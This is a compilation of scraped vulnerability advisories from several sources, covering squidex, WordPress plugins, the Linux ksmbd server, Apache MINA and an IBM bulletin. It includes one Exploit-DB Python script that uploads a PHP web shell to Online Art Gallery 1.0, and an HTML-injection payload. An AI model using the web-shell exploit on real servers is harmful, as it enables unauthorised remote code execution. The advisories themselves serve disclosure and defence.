Improper Handling of Additional Special Element in GitHub repository squidex/squidex prior to 7.4.0.

**Description**

Html injection in Contributors and just only need html payload in Display Name and fire in Contributors list

**Proof of Concept**

    1. Login to squidex 
    2. Create an app with random name.
    2. Go to Edit Profile then Edit users display name with html payload = <h1>Sanket_722</h1>
    3. Go to https://localhost/app/{App/Random Name}/settings/contributors 
    For Full understanding check POC : https://drive.google.com/file/d/1W8KdHgQKBRvRDKbNnPvrv9fYWItI9gQa/view?usp=sharing
    // PoC.js
    var payload = <h1>Sanket_722</h1>
    

**Impact**

inert html character in Contributors list and change response with special character

CVE-2023-3580: Html Injection in Contributors in squidex

Cross-Site Request Forgery (CSRF) vulnerability in Albert Peschar WebwinkelKeur plugin <= 3.24 versions.

**Solution**

 Fixed

Update the WordPress WebwinkelKeur plugin to the latest available version (at least 3.25).

qilin\_99 discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress WebwinkelKeur Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 3.25.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-36691: WordPress WebwinkelKeu plugin <= 3.24 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Projectworlds Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page.

    # Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
    # Google Dork: n/a
    # Date: 14/06/2023
    # Exploit Author: Ramil Mustafayev
    # Vendor Homepage: https://github.com/projectworldsofficial
    # Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
    # Version: 1.0
    # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
    # CVE : n/a
    
    # Vulnerability Description:
    #
    # Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
    # Usage: python exploit.py http://example.com
    
    import requests
    import sys
    
    def upload_file(url, filename, file_content):
        files = {
            'sliderpic': (filename, file_content, 'application/octet-stream')
        }
    
        data = {
            'img_id': '',
            'sliderPicSubmit': ''
        }
        url = url+"/Admin/adminHome.php"
        try:
            response = requests.post(url, files=files, data=data)
        except:
            print("[!] Exploit failed!")
        
    if __name__ == "__main__":
        if len(sys.argv) < 2:
            print("Usage: python exploit.py <target_url>")
            sys.exit(1)
    
        target_url = sys.argv[1]
        file_name = "simple-backdoor.php"
        file_content = '<?php system($_GET["c"]);?>'
    
        upload_file(target_url, file_name, file_content)
        print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")

CVE-2023-37152: OffSec’s Exploit Database Archive

The Float menu WordPress plugin before 5.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2023-3225

The EventON WordPress plugin before 2.1.2 does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.

CVE-2023-3219

The AI ChatBot WordPress plugin before 4.6.1 does not adequately escape some settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2023-3175

A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the processing of SMB2_TREE_DISCONNECT commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.

May 17th, 2023

**Linux Kernel ksmbd Tree Connection Race Condition Remote Code Execution Vulnerability****ZDI-23-702  
ZDI-CAN-20592**

CVE ID

CVE-2023-32254

CVSS SCORE

9.8, (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Linux  

AFFECTED PRODUCTS

Kernel  

VULNERABILITY DETAILS

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability, but only systems with ksmbd enabled are vulnerable.

The specific flaw exists within the processing of SMB2\_TREE\_DISCONNECT commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.  

ADDITIONAL DETAILS

Linux has issued an update to correct this vulnerability. More details can be found at:  
https://github.com/torvalds/linux/commit/30210947a343b6b3ca13adc9bfc88e1543e16dd5  

DISCLOSURE TIMELINE

*   2023-04-27 - Vulnerability reported to vendor
*   2023-05-17 - Coordinated public release of advisory

CREDIT

Quentin Minster (@thalium\_team)  

BACK TO ADVISORIES

CVE-2023-32254: ZDI-23-702

A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the processing of SMB2_SESSION_SETUP commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.

'2208849?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-32250: Invalid Bug ID

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache MINA.

In SFTP servers implemented using Apache MINA SSHD that use a RootedFileSystem, logged users may be able to discover "exists/does not exist" information about items outside the rooted tree via paths including parent navigation ("..") beyond the root, or involving symlinks.

This issue affects Apache MINA: from 1.0 before 2.10. Users are recommended to upgrade to 2.10


**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-35887

IBM Watson Knowledge Catalog on Cloud Pak for Data 4.0 could allow an authenticated user send a specially crafted request that could cause a denial of service.  IBM X-Force ID:  251704.

**CVEID:**   CVE-2023-0842  
**DESCRIPTION:**   xml2js could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/252153 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2023-28708  
**DESCRIPTION:**   Apache Tomcat could allow a remote attacker to obtain sensitive information, caused by the missing of secure attribute in some configurations for JSESSIONID Cookie when using the RemoteIpFilter. By sniffing the network traffic, an attacker could exploit this vulnerability to obtain session cookie information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250740 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-24998  
**DESCRIPTION:**   Apache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by not limit the number of request parts to be processed in the file upload function. By sending a specially-crafted request with series of uploads, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247895 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-28959  
**DESCRIPTION:**   Juniper Networks Junos OS is vulnerable to a denial of service, caused by an improper check or handling of exceptional conditions vulnerability in packet processing. By sending a malformed packet, an attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/252630 for the current score.  
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-32681  
**DESCRIPTION:**   python-requests could allow a remote attacker to obtain sensitive information, caused by the leaking of Proxy-Authorization headers to destination servers during redirects to an HTTPS origin. By persuading a victim to click on a specially crafted URL, an attacker could exploit this vulnerability to obtain sensitive information.  
CVSS Base score: 6.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/256114 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N)

**CVEID:**   CVE-2022-45787  
**DESCRIPTION:**   Apache James MIME4J could allow a local authenticated attacker to obtain sensitive information, caused by improper laxist permissions on the temporary files. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244033 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-31125  
**DESCRIPTION:**   Engine.IO is vulnerable to a denial of service, caused by an uncaught exception. By sending a specially crafted HTTP request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/254734 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-0286  
**DESCRIPTION:**   OpenSSL is vulnerable to a denial of service, caused by a type confusion error related to X.400 address processing inside an X.509 GeneralName. By passing arbitrary pointers to a memcmp call, a remote attacker could exploit this vulnerability to read memory contents or cause a denial of service.  
CVSS Base score: 8.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/246611 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H)

**CVEID:**   CVE-2022-4492  
**DESCRIPTION:**   Undertow could provide weaker than expected security, caused by not checking the server identity the server certificate presents in HTTPS connections. An attacker could exploit this vulnerability to launch further attacks on the system  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/248558 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2023-1370  
**DESCRIPTION:**   netplex json-smart-v2 is vulnerable to a denial of service, caused by not limiting the nesting of arrays or objects. By sending a specially crafted input, a remote attacker could exploit this vulnerability to cause a stack exhaustion and crash the software.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249885 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-28155  
**DESCRIPTION:**   Node.js Request module is vulnerable to server-side request forgery, caused by a cross-protocol redirect bypass flaw. By sending a specially crafted request, an attacker could exploit this vulnerability to conduct SSRF attack.  
CVSS Base score: 6.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250386 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**CVEID:**   CVE-2023-20860  
**DESCRIPTION:**   VMware Tanzu Spring Framework could allow a remote attacker to bypass security restrictions, caused by the use of an un-prefixed double wildcard pattern with the mvcRequestMatcher in Spring Security configuration. An attacker could exploit this vulnerability to create a mismatch in pattern matching between Spring Security and Spring MVC.  
CVSS Base score: 9.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250679 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:**   CVE-2022-46364  
**DESCRIPTION:**   Apache CXF is vulnerable to server-side request forgery, caused by a flaw in parsing the href attribute of XOP:Include in MTOM requests. By using a specially-crafted request, an attacker could exploit this vulnerability to conduct SSRF attack.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/242008 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-0482  
**DESCRIPTION:**   RESTEasy could allow a local authenticated attacker to gain elevated privileges on the system, caused by the creation of insecure temp files in the File.createTempFile() used in the DataSourceProvider, FileProvider and Mime4JWorkaround classes. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/246304 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2023-20863  
**DESCRIPTION:**   VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/252807 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-20861  
**DESCRIPTION:**   VMware Tanzu Spring Framework is vulnerable to a denial of service. By sending a specially crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250701 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-30861  
**DESCRIPTION:**   Pallets Flask could allow a remote attacker to obtain sensitive information, caused by missing Vary: Cookie header. By sending a specially crafted request, an attacker could exploit this vulnerability to obtain permanent session cookie information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/254247 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-1259  
**DESCRIPTION:**   Undertow is vulnerable to a denial of service, caused by a potential security issue in flow control over HTTP/2. By sending a specially-crafted packet, a remote attacker could exploit this vulnerability to a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235004 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-28955  
**DESCRIPTION:**   IBM Watson Knowledge Catalog on Cloud Pak for Data could allow an authenticated user send a specially crafted request that could cause a denial of service.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/251704 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-1436  
**DESCRIPTION:**   Jettison is vulnerable to a denial of service, caused by an infinite recursion when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. A remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250490 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-1108  
**DESCRIPTION:**   Undertow is vulnerable to a denial of service, caused by an infinite loop in SslConduit during close on JDK 11. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249912 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-1471  
**DESCRIPTION:**   SnakeYaml could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in the Constructor class. By using a specially-crafted yaml content, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/241118 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L)

**CVEID:**   CVE-2023-32695  
**DESCRIPTION:**   Socket.IO socket.io-parser is vulnerable to a denial of service, caused by an uncaught exception flaw on the Socket.IO server. By sending a specially crafted Socket.IO packet, a remote attacker could exploit this vulnerability to cause the Node.js process to crash.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/256442 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-20883  
**DESCRIPTION:**   VMware Tanzu Spring Boot is vulnerable to a denial of service, caused by a flaw when Spring MVC is used together with a reverse proxy cache. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255809 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**IBM X-Force ID:**   254437  
**DESCRIPTION:**   Jose4J could allow a remote attacker to obtain sensitive information, caused by a chosen ciphertext attack in RSA1\_5. By using cryptographic attack techniques, an attacker could exploit this vulnerability to decrypt RSA1\_5 or RSA\_OAEP encrypted ciphertexts.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/254437 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)